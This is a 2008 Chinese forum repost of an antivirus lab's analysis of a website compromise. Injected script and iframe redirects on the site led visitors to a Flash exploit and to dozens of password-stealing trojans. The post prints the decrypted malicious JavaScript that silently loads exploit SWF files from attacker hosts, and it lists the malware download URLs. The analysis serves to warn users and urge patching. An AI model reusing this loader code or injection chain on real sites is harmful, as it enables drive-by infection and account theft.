论坛 › 病毒播报 › 大学吧网站挂马事件

flyleaf 发表于 2008-5-29 16:16

大学吧网站挂马事件

5月29日，安天实验室发现，近期利用Flash插件挂马事件较多，提请广大用户注意。以下以大学吧网站为例。

      大学吧网站挂注册页面(http://www.haydao.com/member/register.php)被黑客植入病毒，用户如果访问该网站，
系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制，盗取用户敏感信息，甚
至导致死机。

   该网站问题代码：



    <script type="text/javascript" src="/include/js/common.js"></script>
   http://www.ha****.com/include/js/common.js问题框架代码：

   


    代码解密后得出的地址：document.writeln("<script src=http://www.tv008.com/include/haed.js></script>");
    http://www.t****.com/include/haed.js问题框架代码：





      <iframe src=http://www.fire122.cn/zi.htm?006 width=100 height=0></iframe>
      http://www.fir****.cn/zi.htm?006问题框架代码：




         <iframe width=100 height=100 src=ad/ad.htm></iframe>
         http://www.fir****.cn/ad/ad.htm 网马代码：





         该加密网马解密后可知利用了一个最新的Adobe Flash Player SWF文件漏洞。
         ad.htm解密后网马代码：                     
                     window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="always"/>');
document.write('<param name="movie" value="http://www.psp1111.cn/flash/versionie.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://www.psp1111.cn/flash/versionie.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://www.psp1111.cn/flash/versionff.swf width=0 height=0>");}}


         该漏洞针对Adobe Flash Player ActiveX版本号为9.0.124.0以前的所有版本有效。





例如：版本：9.0.115.0也会中这种网马。
建议用户尽快更新自己的Adobe Flash Player ActiveX或者到Adobe官方网站下载升级补丁：http://www.adobe.com/go/getflash

http://www.fir****.cn/ad/vip1.htm 网马代码：



    该加密网马解密后可知利用以下漏洞来传播：
　　MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
　　RealPlayer播放器IERPCtl.IERPCtl.1漏洞
　　联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
　　当用户访问http://www.haydao.com/member/register.php时，系统会自动

　　下载以下病毒文件：
　　http://www.pp****.cn/e.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajyu)
　　http://60.190.114.**/a1.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akay)
　　http://60.190.114.**/a2.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajss)
　　http://60.190.114.**/a3.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsw)
　　http://60.190.114.**/a4.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtt)
　　http://60.190.114.**/a5.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajto)
　　http://60.190.114.**/a6.exe
　　病毒名：(Trojan-PSW.Win32.QQPass.cbj)
　　http://60.190.114.**/a7.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtx)
　　http://60.190.114.**/a8.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajnn)
　　http://60.190.114.**/a9.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aknn)
　　http://60.190.114.**/a10.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtr)
　　http://60.190.114.**/a11.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajti)
　　http://60.190.114.**/a12.exe
　　病毒名：(Trojan-Dropper.Win32.Agent.sbh)
　　http://60.190.114.**/a13.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsz)
　　http://60.190.114.**/a14.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtn)
　　http://60.190.114.**/a15.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akka)
　　http://60.190.114.**/a16.exe
　　病毒名：(Trojan-PSW.Win32.Lmir.bvh)
　　http://60.190.114.**/a17.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akau)
　　http://60.190.114.**/a18.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsr)
　　http://60.190.114.**/a19.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajth)
　　http://60.190.114.**/a20.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajtq)
　　http://60.190.114.**/a21.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aeoa)
　　http://60.190.114.**/a22.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.aklk)
　　http://60.190.114.**/a23.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajyj)
　　http://60.190.114.**/a24.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajsp)
　　http://60.190.114.**/a25.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajta)
　　http://60.190.114.**/a26.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.akjn)
　　http://60.190.114.**/a27.exe
　　病毒名：(Trojan-PSW.Win32.OnLineGames.ajyu)
　　http://60.190.114.**/a28.exe
　　病毒名：(Trojan.Win32.StartPage.avr)
　　http://60.190.114.**/a29.exe
　　病毒名：(Trojan.Win32.Agent.lww)
　　以上病毒文件为下载者木马和游戏盗号木马，自动运行后将会，盗取用户敏感
信息，甚至导致死机。由于下载数量太多，这里不一一分析。

查看完整版本: 大学吧网站挂马事件